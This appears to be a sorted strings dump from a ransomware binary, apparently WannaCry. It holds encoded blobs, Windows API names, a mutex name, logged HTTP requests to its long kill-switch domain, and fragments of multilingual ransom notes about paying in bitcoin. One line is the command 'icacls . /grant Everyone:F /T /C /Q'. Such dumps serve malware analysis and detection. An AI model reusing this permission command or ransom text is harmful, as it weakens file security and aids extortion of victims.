GCYPv9lQlkfTV1+aTMUTA0VfaLFyhZq68nTvu6n4pfUV30t9T3TFceGCIx4zTnCQ6S5EjjToosWCxmsltoACAot76+pWFnqcM81lhzddyobk6y7FHmjg68R4aFhZxnGaWE98CXh+wNXxpVQrRWuXsT/exO9Fgq3iJa9YrhsWDVrNddlLhlPZSjd+r7Vb1N42DLbI3TsRC6QTWTCW/u9CZP5OtTLfF5RtGJpRD1w7ATC3MGMEx3ecXVNTq93wT9UOpAdiYhTfRbbGSc3CQYjiZAQeP8+9l+vBMXIVPix9JjXoMpMMNALmtmyPcDktAfCRTNLvWW7/Yr/ZO80z7zqvqhJEEdffn8QkT9e5IWcMjcgV3Gglscqoh41iMXn7hUxI2bGaD2DPEQvGkIM1b/vVlcwQZ5hgqlHRLOCDWdMiIPJOyikWBpc0XExEycIbYGOOlrO1qmrdigNdT1yDJQK0Iv0NrdhqHw2+YH85NqAoCiWHU9cXoGYyaYsAy2tz1FEVsu6ci4R/YbYYSf6bOJo/jNWi/2Cpy6YkwJLe5+AMfbY2EaKnFOiMNs9lrNFzpwbfa7F+K9HYIis1Xtz0A4vXrvJashxkwrYVcchVKnccoXc5Q0mj2emCkx7YyU+DWEhpL705osvQUIkjXM4bmBD/8t5Fa2ByIChQeolaJJ3sDLApsbVoDd+8ZbRGl4964iBIMaHFxSapRYrdlwk29AS3LXPiJBFdQQZXwCOROaz7PZfs086Nt3A8Zq8FKpL6/ALGQDfNi2GdixRe8LNkFWt8ZIy8kzuf9uR6sUivF8FZKwniB9XioG9S0Oe0fHmIG8vPISlcD5hQlRVhnbHFybZAECaqzV97MMKdCi1oIys9aUz7r4H1AqrHiS/FXMyd/EP21A6cM3zGjxyktGoQx0hV3sYvthjyIwQAcUKpgmL+VETTLp8QV8kqV2rrzpqzHgbmgFThT13t6mHf9ELtg8wovtONtS0VBsTCaMSSpDwo5Jo7OayvdM0ZgmSJF3q+QK0 GCYPv9lQlkfTV1+aTMUTA0VfaLFyhZq68nTvu6n4pfUV30t9T3TFceGCIx4zTnCQ6S5EjjToosWCxmsltoACAot76+pWFnqcM81lhzddyobk6y7FHmjg68R4aFhZxnGaWE98CXh+wNXxpVQrRWuXsT/exO9Fgq3iJa9YrhsWDVrNddlLhlPZSjd+r7Vb1N42DLbI3TsRC6QTWTCW/u9CZP5OtTLfF5RtGJpRD1w7ATC3MGMEx3ecXVNTq93wT9UOpAdiYhTfRbbGSc3CQYjiZAQeP8+9l+vBMXIVPix9JjXoMpMMNALmtmyPcDktAfCRTNLvWW7/Yr/ZO80z7zqvqhJEEdffn8QkT9e5IWcMjcgV3Gglscqoh41iMXn7hUxI2bGaD2DPEQvGkIM1b/vVlcwQZ5hgqlHRLOCDWdMiIPJOyikWBpc0XExEycIbYGOOlrO1qmrdigNdT1yDJQK0Iv0NrdhqHw2+YH85NqAoCiWHU9cXoGYyaYsAy2tz1FEVsu6ci4R/YbYYSf6bOJo/jNWi/2Cpy6YkwJLe5+AMfbY2EaKnFOiMNs9lrNFzpwbfa7F+K9HYIis1Xtz0A4vXrvJashxkwrYVcchVKnccoXc5Q0mj2emCkx7YyU+DWEhpL705osvQUIkjXM4bmBD/8t5Fa2ByIChQeolaJJ3sDLApsbVoDd+8ZbRGl4964iBIMaHFxSapRYrdlwk29AS3LXPiJBFdQQZXwCOROaz7PZfs086Nt3A8Zq8FKpL6/ALGQDfNi2GdixRe8LNkFWt8ZIy8kzuf9uR6sUivF8FZKwniB9XioG9S0Oe0fHmIG8vPISlcD5hQlRVhnbHFybZAECaqzV97MMKdCi1oIys9aUz7r4H1AqrHiS/FXMyd/EP21A6cM3zGjxyktGoQx0hV3sYvthjyIwQAcUKpgmL+VETTLp8QV8kqV2rrzpqzHgbmgFThT13t6mHf9ELtg8wovtONtS0VBsTCaMSSpDwo5Jo7OayvdM0ZgmSJF3q+QK0a GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cachev GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cachey GetACP GetActiveWindow GetAdaptersInfo GetCommandLineA GetComputerNameW GetConsoleCP GetConsoleMode GetCPInfo GetCurrentDirectoryA GetCurrentProcess GetCurrentProcessId GetCurrentThread GetCurrentThreadId GetEnvironmentStringsW GetExitCodeProcess GetFileAttributesA GetFileAttributesW GetFileSize GetFileSizeEx GetFileType GetFullPathNameA GetLastActivePopup GetLastError GetModuleFileNameA GetModuleFileNameW GetModuleHandleA GetModuleHandleW GetNativeSystemInfo GetOEMCP GetPerAdapterInfo GetProcAddress GetProcessHeap GetProcessWindowStation GetStartupInfoA GetStartupInfoW GetStdHandle GetStringTypeW GetSystemTimeAsFileTime GetTempPathW GetTickCount GetUserObjectInformationW GetVersion GetWindowsDirectoryW Global\\MsWinZonesCacheCounterMutexA gQu2Nyelth0SlOOalZtc8WGRFUrm2ZuCQpqSN9Z71t3PqXBOQIuQOvBm7DRt8LiOGWJ4Fgiw8zLUckIARWEUXUjklpNKgfWJR0DVxM6NGPBka6PlSXaaDn6cO35Likjr6hlVB8cOLTnmUzaUvSa3lR3RXRPG2rgZ3ARZALJ17t9dGs1u5EuNcl0UTmZ4FCpqYHadNm0frUnLz3f1VAHc/0/0jjEyMj+h4FMHHDslnvti7ajC1ws7EoOjVXfDV7GDyKJEr2CojIepkRTfLHNLMCd98YT1DYZRB/a8if3FzhYRMAZb1QKW9FiQi0HJra7eYXjA8cx4wZCq/M7XjTkXx6uSJUIGo45e6o6oE/PV/a18NryPB7YyO3tQz3BuSF3CKDxp3r4X+YgX+8yaQSKXmJVrXh3JLeSjtySsoYAUv49zfJVpmvsjXTXe1ZVXjg1dHXOB/286pHGYQsUSI1gPma99cJNVyLq/2NWfkvj67Kuu8gIuBOZpzsYvO8ZGSy4r+vj/kMIxyPqScm8n8oJmDkVyMvaSb/PIDjLf9gT41Zak2qiiobBtWWQlisXBNNLrx7VC9UYLDm4riZgYfVjvNI0DdSCzxwm880gSQghGcZDth6qfL//y/JWArPrY397u7IQDQ gralkGcVWBOlqZ6muD6zMY8kChC9NW9mzBRoUa4D8xlVjMpiqXlNggBIydZLt7KE5Nqcel/qY6hEc7FHT3+bPjHVKO5yCYF8R1Mun5ixLcdXS3NghRRf9qC3nr8XLuyVS/+ktxQYZlz0k48pfLrspxguOJkJER3GZcDT0B0rJHHIwqdx1VQVA3OUsbNBdNz0ReDlKIZt8kTDlk4mO8+YM9Uz2l6uV8QPCTDtYZZeaJCDxlQx+sXE2ZgAQEr6neprH8ycAIb64J3C5ZI0yFkLDbN2U+BkPA8otv1dADGEqxI1TtkOY/LcyNddDhyAW9gm4qf3MQyzclmKXbk8uEb3ZKFRmhGAUi+SFtzvnF6DZ5XCgpICgfBlIsU7SW6nO6yrRnOR6WKty1jMySkvyEUBr97g3YOgzTsp0vOZBz1mFpD0qJ7jOSjyWD5q+/HB7bJFC25fBV/a4+bp5dMa6s9wjOF9LUt1VPCd6mGZ1IxZQV94kzBmdbNoQNotIBUcyLOO3mtEyKHMarLQ7IdL3+6QPjrtZ676JFF6Fhco3kcwxLi7tEokjkrjiuxTJ7VOLMMoSqihIRgpTXkEvW4yy3O1fgQ+bAb0PNcCPaSxznfpGq9Rcq8uTkCgqDKEBujpjKKYi4BHd gtDZ1D3PsViACf6eCNazNXjyfs3PVKtrMZBuRJKW8wzFjbzQSIhdIDZOSjAXUgcdlP97sbMNkKnaMa6b5OoIkl+ntcznx2xWj6wCZGN8TNy49d+kC0aTEA4AqC8sAL5vg98Jkmv00XEKl2vICmUYMDTAmKpEiffmCaH19aOwHfwElTy1EnXAyAqSUxPax+VUeabSwSgo77Y/DOJUNTtvSA9akxw7ctUa6zNCo9NYkpYdmkl0kUVzEgdZQuLPb8He6gCiO/BIj5xXo92rx+uhczk25ArAZcQXDX1MRxY20HuT3rhmYYLpiuJX/mu7wb6CGWZ4i6/eolXB3sb3ucvGEzAheJm9zxnH3/tcqpC4MtJe/6OAawtD+e362d6 h(((( H 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 HeapSetInformation HH1TlE7vG8wQ3JcV1HUpzIwUCS8z7vW74TUSBtyIe16ystcJU7djeG0KCTSHR4IomXj21gAWBJ1KoYCP0DEla8VjRU/B14kOIuN8FTngqm3tqHnbvjSHGmj5pb/FMugBfNI1r6b6GIvs+f77Qrk+2Klg666tsvxAoP09zUU4mrbG3FA6UYmtE4wVlNsGl3mN9wD/PbHT7wW+EIZjY/rcdQjnRC2cBuBqtprm2VW7vZkbuFJGFw+xuTJpn2ZNO3mICoJRSzr9vMQVZ6ntlNK70imc7hJekUkLTg/voycWCazfNGX4kVPKKulSseJzg+RyjT/Fcn5dr66BsnKznEOauQ/jPtFRlpoTptketkqto4H2yRoNdw3p+jHUVaAYd0KWuQ5ACx3ISx68t7SX+n1LLtsB/UiwK9eEyLJEs92tUN3hAePoHQpUeKMqA66qFwypBXcJGo/DozC9ZpPdTTDWxm5QJCiG6cwVOyapdsttOPJ6M041u/ajk3fB9xJ5rNeRJvAnvC0G9TAWBirQNarF0510ha3xISYvyoLpwLF+eQxJN1E5Ezdhy10qQqJejfWelL0XdUu2jv0XaDg0mE0x+zgoxIpmKQIp7AMGyKYr7jhyYrmvswkb4gjYXnoQggTv2zYtHs6+Pf6x5eYVU+8yMG25loa2OIQ4JEjfDAJ+ihoiEQDrqj+L1/FzphXtqGvQkTx34OMOHgMNcasKdv96ykr7kDiDnmilhpek2gji9kju0pJFFcT/WdKy7jelCWuFMkBndIX8wlyGeaysOvYBBECd3eZ66npn8NWbz+z7hfQbR9LI2W9wO8TDCPCdkiYxM0AAYMz3iDaYhkcW73S5SSWLYnGm8I+S1c4hU7CKD84gEvn0vYZKE3dMKFvotZ/mMntRvIfX1ZuhRvmkD+PQyA5bRSyZicq0V2smJots3a2Fgv+/Znj9HbtMB62SdFfXBTkh6TOvVBigd6tD/FhXcBhnKOO3hxfxbekatKUmaLJfcc0XY9sjhdlOd72p8YN HH1TlE7vG8wQ3JcV1HUpzIwUCS8z7vW74TUSBtyIe16ystcJU7djeG0KCTSHR4IomXj21gAWBJ1KoYCP0DEla8VjRU/B14kOIuN8FTngqm3tqHnbvjSHGmj5pb/FMugBfNI1r6b6GIvs+f77Qrk+2Klg666tsvxAoP09zUU4mrbG3FA6UYmtE4wVlNsGl3mN9wD/PbHT7wW+EIZjY/rcdQjnRC2cBuBqtprm2VW7vZkbuFJGFw+xuTJpn2ZNO3mICoJRSzr9vMQVZ6ntlNK70imc7hJekUkLTg/voycWCazfNGX4kVPKKulSseJzg+RyjT/Fcn5dr66BsnKznEOauQ/jPtFRlpoTptketkqto4H2yRoNdw3p+jHUVaAYd0KWuQ5ACx3ISx68t7SX+n1LLtsB/UiwK9eEyLJEs92tUN3hAePoHQpUeKMqA66qFwypBXcJGo/DozC9ZpPdTTDWxm5QJCiG6cwVOyapdsttOPJ6M041u/ajk3fB9xJ5rNeRJvAnvC0G9TAWBirQNarF0510ha3xISYvyoLpwLF+eQxJN1E5Ezdhy10qQqJejfWelL0XdUu2jv0XaDg0mE0x+zgoxIpmKQIp7AMGyKYr7jhyYrmvswkb4gjYXnoQggTv2zYtHs6+Pf6x5eYVU+8yMG25loa2OIQ4JEjfDAJ+ihoiEQDrqj+L1/FzphXtqGvQkTx34OMOHgMNcasKdv96ykr7kDiDnmilhpek2gji9kju0pJFFcT/WdKy7jelCWuFMkBndIX8wlyGeaysOvYBBECd3eZ66npn8NWbz+z7hfQbR9LI2W9wO8TDCPCdkiYxM0AAYMz3iDaYhkcW73S5SSWLYnGm8I+S1c4hU7CKD84gEvn0vYZKE3dMKFvotZ/mMntRvIfX1ZuhRvmkD+PQyA5bRSyZicq0V2smJots3a2Fgv+/Znj9HbtMB62SdFfXBTkh6TOvVBigd6tD/FhXcBhnKOO3hxfxbekatKUmaLJfcc0XY9sjhdlOd72p8YNw How to buy bitcoins}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid11827162\\charrsid10775863 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 >. How to buy bitcoins}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid5593755\\charrsid11698073 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 >. How to buy}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 bitcoins>. HTTP/1.1 200 OKDate: Wed, 30 May 2018 15:34:22 GMTContent-Type: text/plainConnection: keep-aliveSet-Cookie: __cfduid=da10305ee2446276c19f4d5c76c652efe1527694462; expires=Thu, 30-May-19 15:34:22 GMT; path=/; domain=.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com; HttpOnlyContent-Length: 1Server: cloudflare-nginxCF-RAY: 423243b970d4a869-CDGv HTTP/1.1 200 OKDate: Wed, 30 May 2018 15:34:26 GMTContent-Type: text/plainConnection: keep-aliveSet-Cookie: __cfduid=d601df8d69eccd96df5a5e5fc812588201527694466; expires=Thu, 30-May-19 15:34:26 GMT; path=/; domain=.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com; HttpOnlyContent-Length: 1Server: cloudflare-nginxCF-RAY: 423243cd828db765-CDGy HttpDefaultExpiryTimeSecs hWjOELM/oLsaLWaWkBNpQcNK8bFtNS7P9EpmbuEXxDfeDD58iEGYXfQcP7VpR2sOT9LwJAIeh6A+jdqwmIG6+oQ8vrHKPDnaYKv3S108w+OEeT45BFYJKwWk+Ra3vRxnKbnRwJQuKEFILgZJSbVEG96tpqBQ4zYjNt/F17ESbH8qo84gKWu6RAAR6Pr+Urtj/81uAJJZHtd0NwBxGdcO566nFCFN3gjt0JoeF2MLmt0/P2yR9B9PGwlFViNLLfIDbqh7n5SJcMx5G6bTAD68SMpC3btqkL79qvdoP/NWLWfNbfFa+bw7GloQ+rmDHBlJQ5hg6IMi+REkxWwPquOqXoXnOtVv0M2mh0JKr6B7BinPYKTvRTwillNISUh2MVr8BfHLz52EoxrxSlctRKrIxVtBd41QsZ8KU/39GgueUuZIf7M0Cfck4pAOAsx5yeog9EtNtz2iXgOo3hyDc0h1Y++cVvvhmuig0qXJzt8Cavc/WYSDuDbVfMVxUwP+KTyjbOaYDJLrfBU0g1+oCQ8LF4i6eZn3/9Qah9fJpXBEVUkjQ6zHR9YeOjAqKuR4gqR+88y47cE25XMRehX66tw7i5iYm46aLdkMun6+qqX0sX4VP15G1+tOmBW3Cgi1YWV+NqKly i recupera toate fi}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 i suma corect\\'e3\\loch\\f31528 \\hich\\f31528 la adresa specificat\\'e3\\loch\\f31528 \\hich\\f31528 \\'ee\\loch\\f31528 \\hich\\f31528 n aceast\\'e3\\loch\\f31528 \\hich\\f31528 fereastr\\'e3. i, iar plata va fi procesat\\'e3\\loch\\f31528 \\hich\\f31528 . \\'ce\\loch\\f31528 \\hich\\f31528 n cazul \\'ee\\loch\\f31528 \\hich\\f31528 n care antivirusul dvs. se actualizeaz\\'e3\\loch\\f31528 }{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 icacls . /grant Everyone:F /T /C /Q icacls.exe IMNyx1n62TU6oCC1ftHI4dy2cE4rIsPH7X9HCBGPYPsZAbsUCkkc1xBo8Z4Fsvp4FiQrqW1O/xCaPUg4mA8co3pxJxH14AliGB2uDI4D4uFm2kySLndaPbMGkbKX+IjjsqmUGSPvTO+8hpMOUODen4e8Kd9gZSMoNHSi2H2ti8wUlr07BC0Zu4eZ9VUrHG4qmqFAXRlqZF60Xj9y7zKK+33UP9pJTcbqy9BcvdgjEFmVcc323Gn9JWiPtAordxaRB1/EhmtL6ztjT2wK/cZn8/oymzo9kQ+o2+jeGC/lt7/NgtMhjskYnLIDr05P7PGhQWYA//03d9ZU79r7dJ+Cf3CWu8lW23D7W54BohM82affObtEDnwDlgg+MnE incompatible version incomplete distance tree incomplete dynamic bit lengths tree incomplete literal/length tree inflate 1.1.3 Copyright 1995-1998 Mark Adler InfoTip insufficient memory iu p\\'b3\\loch\\f31528 \\hich\\f31528 atno\\'9c\\loch\\f31528 ci kliknij <}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid10775863 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 Check Payment}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ iXwqApmgq6g1zvQ8yiI9AOXvptfPRSqD6MWGBW4K1qn8iouCFzCmbV3qtUUQwhbuHoS72FlhntFutfdfqLVAirkMoGlDd6/SjLbRuADO9li2BTwGZ0ra6QjsOGsHiiCVlZPgXtvWDoFknVZl6Tp4SJlJspQ2ejSm3yq94gCQPtvtzLczwi6VDAFhpRHzs+nSGqa4XIQSuT+CoKRCRPJMvj4DiBsrNBhZhnWAAtB3kx3RmyCQiHaS3ay6TWgoJoXt2wOA6GtqnkrWoYy3/WujraijCVFkSBEb5vZxPPSXPnUFtStdhD8Ntocz0tsZNisxGxOJOYLjE33CI3qJU+Dluy1Ks0a5UTOSzpXt4Pa0ypNQhQ1SluqL2CK5u5XfSOKtJBSxRk0PbECzO6YAJHo5k5vjZDAf9NoaYketzhUSI0JZfn8ujw0OyyGsXRpF1mi20mnrxau9P+3M/yTl6Hy02KgZOaKv/JNxkk/GFg70MaDu88N94oeQzV8cOCpzoTCEeBrx8hTwj9TgrlgZvXze353pfSwVS5xFcPT+Gmp1E1TMadDs0nlbPlGBftJmUsG7mvQfgv4XYX0AMxz5YrqwGJfvTxKniphkH0HXhQlkKV0w/J/IVfQFQcGVrh3zZeE9PByrd7oxpyNSiXlIU9AUZp7WKzuVPIMQx3y4/g6QZbZprnHbUCiv9fVqYSj3+cwna2fn7kxdHqTGF13uO4uivs86us1LLjCZeiB4Zo4ih/2f4DNmcWoXHmb3FIWmNCm5LQM7Omt1BXKyaUyPUz5z0Z8HBNxhZNjepldrabniSaClovGr/IwlgOD8OqCcKqOiQaDknm42wYGpmiz9Cu9EJ4MlMXu7wK15mDoq8LjQGc/MIbd4tNUoGPn5IFTEgUW6WiWoOPPY8KQ1qDj+aj6+fa4nE110n8PKNq2bP7yT+4ECd9Lq+vZJ/M1sA3R0EgHrHbYwugIZ5pASDi2LnPObGl8cJS/UQHkDtSLetS2yWFfU+iWIDjRRevP/bhH772z iXwqApmgq6g1zvQ8yiI9AOXvptfPRSqD6MWGBW4K1qn8iouCFzCmbV3qtUUQwhbuHoS72FlhntFutfdfqLVAirkMoGlDd6/SjLbRuADO9li2BTwGZ0ra6QjsOGsHiiCVlZPgXtvWDoFknVZl6Tp4SJlJspQ2ejSm3yq94gCQPtvtzLczwi6VDAFhpRHzs+nSGqa4XIQSuT+CoKRCRPJMvj4DiBsrNBhZhnWAAtB3kx3RmyCQiHaS3ay6TWgoJoXt2wOA6GtqnkrWoYy3/WujraijCVFkSBEb5vZxPPSXPnUFtStdhD8Ntocz0tsZNisxGxOJOYLjE33CI3qJU+Dluy1Ks0a5UTOSzpXt4Pa0ypNQhQ1SluqL2CK5u5XfSOKtJBSxRk0PbECzO6YAJHo5k5vjZDAf9NoaYketzhUSI0JZfn8ujw0OyyGsXRpF1mi20mnrxau9P+3M/yTl6Hy02KgZOaKv/JNxkk/GFg70MaDu88N94oeQzV8cOCpzoTCEeBrx8hTwj9TgrlgZvXze353pfSwVS5xFcPT+Gmp1E1TMadDs0nlbPlGBftJmUsG7mvQfgv4XYX0AMxz5YrqwGJfvTxKniphkH0HXhQlkKV0w/J/IVfQFQcGVrh3zZeE9PByrd7oxpyNSiXlIU9AUZp7WKzuVPIMQx3y4/g6QZbZprnHbUCiv9fVqYSj3+cwna2fn7kxdHqTGF13uO4uivs86us1LLjCZeiB4Zo4ih/2f4DNmcWoXHmb3FIWmNCm5LQM7Omt1BXKyaUyPUz5z0Z8HBNxhZNjepldrabniSaClovGr/IwlgOD8OqCcKqOiQaDknm42wYGpmiz9Cu9EJ4MlMXu7wK15mDoq8LjQGc/MIbd4tNUoGPn5IFTEgUW6WiWoOPPY8KQ1qDj+aj6+fa4nE110n8PKNq2bP7yT+4ECd9Lq+vZJ/M1sA3R0EgHrHbYwugIZ5pASDi2LnPObGl8cJS/UQHkDtSLetS2yWFfU+iWIDjRRevP/bhH772zL j2we/eOEgsdJaALstzzVll0rPXIF501SIOmrcFEJh8lIEf8pW1daYqgEMXZ/1BpUzwMWD5jXvWQa+axhtIilVnEC1OwTGy3wi/r9LcDedgTXOnANzcYcUctIQTk1i2YSbSbAXQGfcsOz8WuTaRM6izqBTyXIK9tN11KVs795Y4BbKeIypCrVHOUY6Y2OtaHS9GhqoGojWs39jjKb9sPkWulrHwPEUl9A42NyUza+S6awW/ySODRkWkTKYS2zyEAso0k4KR4hl2KvJFDnwX157Hp1rsfwS2BCFjByigWVbdT5GMi0HaSukFUskn3ghnVP1G9fWhI7XzVi4XXu+uzDfYNainzFux7CUA33IhPTet1KPoVrQZYwzyjpv52sBPWG4RSCKDYRR+QUo0Pte8/0ix4PGf/VFzxDB+C3pHP2HGNsNX9zT9FJZLgOld40WLdof0IsgNeTLUVyy+o0FL/xp1+J0UQgpb71qWilo8RDEZqcFle9+FdGTlnR4ZcbgG7j1Td/YltwmCAZsTFbCQwmDls8KmZlvzaz4qOOLTuVAyX2e6HKfuPQmzs8X6rGnDTqtFvEELPjWtEQsxs8d1krRZO3FYFUUTeWphjMefQjj745faY6AHmnLK8sir5aG7B6v6OsqHGZ/UXDTPDCCbIBdz2ohdHbKAMH0rka/vVZXeQ8AdSwIOK8j792KDUQFq2BoEEHoOLmwCCg4D0Sbuyh+CcSDYyR